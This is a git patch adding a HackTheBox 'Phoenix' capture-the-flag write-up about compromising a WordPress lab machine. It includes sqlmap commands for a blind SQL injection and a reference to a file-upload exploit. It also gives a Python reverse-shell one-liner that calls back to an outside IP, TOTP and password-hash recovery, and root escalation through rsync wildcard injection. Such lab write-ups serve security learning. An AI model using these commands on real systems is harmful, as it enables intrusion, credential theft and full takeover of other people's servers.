From 3d1ed9c4bae9b394ec9a6723f82f48c8744c928d Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sat, 25 Jun 2022 20:28:06 +0500 Subject: [PATCH] Create Phoenix.md --- HackTheBox/Phoenix.md | 339 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 339 insertions(+) create mode 100644 HackTheBox/Phoenix.md diff --git a/HackTheBox/Phoenix.md b/HackTheBox/Phoenix.md new file mode 100644 index 0000000..d1e360f --- /dev/null +++ b/HackTheBox/Phoenix.md @@ -0,0 +1,339 @@ +# HackTheBox-Phoenix + +## NMAP + +```bash +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) +80/tcp open http Apache httpd +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +|_http-server-header: Apache +|_http-title: Did not follow redirect to https://phoenix.htb/ +443/tcp open ssl/http Apache httpd +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +| http-robots.txt: 1 disallowed entry +|_/wp-admin/ +|_http-server-header: Apache +|_http-title: Did not follow redirect to https://phoenix.htb/ +| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US +| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2022-02-15T20:08:43 +| Not valid after: 2032-02-13T20:08:43 +| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26 +|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68 +| tls-alpn: +|_ http/1.1 +8888/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10) +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +``` + +## PORT 80/443 (HTTP/HTTPS) + +Visting port 80 it's going to redirect us to port 443 on `phoenix.htb` domain so let's add this to `hosts` file + + + + + + + +We can see the results of wappalyzer extension that it's using wordpress cms + + + +Checking the `/wp-admin` page we'll be presented to a login page which has a signup option also we can checkout forums as well + + + +On the forums we can see there are 5 users, which can be helpful in bruteforcing in login + + + +As we can signup, so let's try creating a user + + + + + +After logging in we can see the dashboard of wordpress but we are not really a privileged user so can't really see anything else other than blogs + + + +Although we can see a plugin named `Pie Register` + + + +For this plugin was a sqli vulnerability in two different versions + + + +There wasn't any poc for this version, but there was a poc for the other version + + + +So for checking the version, I ran `wpscan` to find out the version all to check if there were any other plugins installed + +```bash +wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v +``` + + + + + +This is using `3.7.4.3` which isn't vulnerable but we do see other plugins out of which I found , after checking for vulnerabilties in these plugins `asgaros-forum` was having a blind sqli in version < 1.15.13 and the version installed on wordpress was `1.15.12` + + + + + +Running this payload it does indeed work and refreshes the page after 10 seconds but since it's a blind sqli it's really hard to exploit it manually so I ran `sqlmap` but it wasn't able to indentify the GET parameter vulnerable to sqli + + + + + +So trying it again with `--level=2` and `--risk=2` + +```bash +sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch +``` + + +And after waiting for a while it turns out that it's time-based blind sqli so it's going to take a really long time in dumping data from tables + + + +Now dumping the database was taking way too long + + + +So we could dump the table which only has the name of the plugins to do that I looked up on google and found the question asked on stackoverflow + + + +But it's still going to take a lot of time in dumping rows and columns, so on researching more into wp_options I came to know that we can query for active plugins `active_plugins` in column name `option_name` by selecting `wp_value` in `wp_options` table + +https://stackoverflow.com/questions/2624551/wordpress-deactivate-a-plugin-via-database + + + + +We can provide the sql query through `--sql-query` + +```bash +sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT optio +n_value FROM wp_options WHERE option_name = 'active_plugins';" --batch +``` + + +After letting this query run, it showed four plugins + + + +* accordion-slider-gallery +* adminimize +* asgaros-forum +* download-from-files + +## Foothold + +I tried checking exploits for accordion and adminize but they were way too old so I looked up exploit on `download-from-files` and it was having a recent vulnerability regarding arbitary file upload + +https://www.exploit-db.com/exploits/50287 + + + +To exploit this, we need to make a php file with a extension `.phtml` + + + +After running the exploit it's going to give us an error regarding verfication of the ssl certificate and would fail to make a request, so we need to add `verify=false` when making a GET and POST request to phoenix.htb + + + + + + + +And after making those changes it should upload the php file + + + + + +Using a python3 one liner to get a reverse shell + +```python +python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` + + + +After getting a shell, stabilizing it through `stty raw -echo` and `fg` + + + +Being in wordpress directory, we can read the database password from `wp-config.php` + + + + + +But when trying to change user it's going to ask us a verification code + + + +So there's a 2FA but I wasn't able to find any secret with which I could generate the TOTP or OTP so I decide to look around and found a plugin in wordpress plugins + + + +Googling about this plugin, it seems that it's used a SSO (Single Sign On) used with multiple application + + + +Using the db creds found with mysql, we can login to the database and view the tables + + + +Reading the data from `wp_usermeta` we can find the TOTP key + + + +In order to use this secret to generate TOTP we need to use `oathtool` + + + +With this we generated TOTP which we can use for the verification, I tried for both users but it failed + + + + + +## Privilege Escalation (editor) + +Searching about where the configuration for google authenticator is and seems that there's a PAM module configured with ssh + +https://wiki.archlinux.org/title/Google_Authenticator + +From the `/etc/pam.d/sshd` file we can see is required in ssh + + + +Also looking at `/etc/security/access-local.conf` the IP `10.11.12.13` is allowed not be asked for 2FA according to the documentation for google authenticator from the arch wiki + + + +After figuiring this out still the password doesn't work on these two users, so I checked the database again for password hashes and try cracking them + + + + + +This cracked the 3 hashes so trying these for the users on the box through ssh as on switching users it will ask for verification code and we already saw that it won't ask for verification if the connection is comming from 10.11.12.13 + + + +The password `superphoenix` worked for `editor` user + + + +But doing `sudo -l` it's going to again ask for verification code + + + +Checking on which directories we have access to writing somewhere + + + +Here we can see a backup of something which is being ran with a difference of 3 minutes + + + +Unzipping the archive to see what the backup is of + + + +This gives a file named `dbbackup.sql` + + + +And it is only taking backup of table's structrue of wordpress database + + + +Here I fell into another rabbit hole for mysqldump CVE which was found in 2016 so I again wasted my time going down that rabbit hole, after spending hours tried running `pspy` but it wasn't showing processes as any other user + + + +Running it with `-f` showed us a binary named `cron.sh.x` that was being called + + + +We couldn't check what and how the commands were being ran, so running it with the current user and checking pspy it should the commands that the binary was running in the background as a root user + + + + +```bash +NOW=$(date +"%Y-%m-%d-%H-%M") +FILE="phoenix.htb.$NOW.tar" +cd /backups +mysqldump -u root wordpress > dbbackup.sql +tar -cf $FILE dbbackup.sql && rm dbbackup.sql +gzip -9 $FILE +find . -type f -mmin +30 -delete +rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/ +``` + +This explains about the mysqldump that was being created in /backups folder, to break down this script + +1. This script is first urnning the `data` command and saving it in `NOW` variable +2. `FILE` variable is having the archive name with the time timestamp +3. It's switching to /backups directoy +4. Running `mysqldump` to create a dump of wordpress database and saving it in `dbbackup.sql` file +5. Creating a tar archive of dbbackup.sql file and removing it +6. Creating gzip archive out of tar archive +7. Running `find` command to check if the file was modified in the last 30 minutes if it was then it deletes the file +8. And in the end it's using `rsync` which is used for transferring files remotely and here it's vulnerable to command injection because it has `*.*` meaning that i's transferring every file from the /backups directory + +Referring to an awesome blog post on command injection there was technique for rsync + +https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb + + + +We can create a bash scipt having the contents + +```bash +chmod +s /bin/bash +``` + +And creating a file which will be the argument for rsync for the remote commands to be executed via a script + +```bash +touch -- "-e sh script.sh" +``` + + + +Checking the permissions on the bash binary + + + +## Rerefences + +- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 +- https://stackoverflow.com/questions/6219618/where-is-plugin-data-stored-in-the-database +- https://stackoverflow.com/questions/2624551/wordpress-deactivate-a-plugin-via-database +- https://wordpress.stackexchange.com/questions/286759/how-do-i-check-what-plugins-are-enabled-via-the-database +- https://www.exploit-db.com/exploits/50287 +- https://stackoverflow.com/questions/51768496/why-do-https-requests-produce-ssl-certificate-verify-failed-error +- https://wiki.archlinux.org/title/Google_Authenticator +- https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb